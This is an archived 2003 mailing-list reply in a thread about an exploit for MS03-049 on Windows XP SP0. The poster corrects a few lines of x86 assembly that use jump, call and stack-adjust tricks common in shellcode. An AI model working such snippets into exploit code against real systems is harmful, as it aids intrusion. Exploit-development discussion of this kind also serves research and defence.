Vulnerability Development mailing list archives
Re: ms03-049 exploit xp sp0
From: "upb" <upb () email ee>
Date: Thu, 13 Nov 2003 03:25:25 +0200
Umm, this is what u get when ur tired :P ----- Original Message ----- From: "upb" <upb () email ee>
00000000: EB14 jmps 000000016 00000002: 832C2440 sub d,[esp],040 ;"@" 00000006: E8F5FFFFFF call 000000000
That code was supposed to be: 00000000: EB05 jmps 000000007 00000002: 832C2440 sub d,[esp],040 ;"@" 00000006: C3 retn 00000007: E8F6FFFFFF call 000000002 And ofcourse the shortest way to jump back is by using the "jmp" instruction :) 00000004: E9F7FFFFFF jmp 000000000 or 00000004: EBFA jmps 000000000 upb
Current thread:
- ms03-049 exploit xp sp0 wirepair (Nov 12)
- Re: ms03-049 exploit xp sp0 upb (Nov 12)
- <Possible follow-ups>
- Re: ms03-049 exploit xp sp0 upb (Nov 12)
- Re: ms03-049 exploit xp sp0 dave (Nov 13)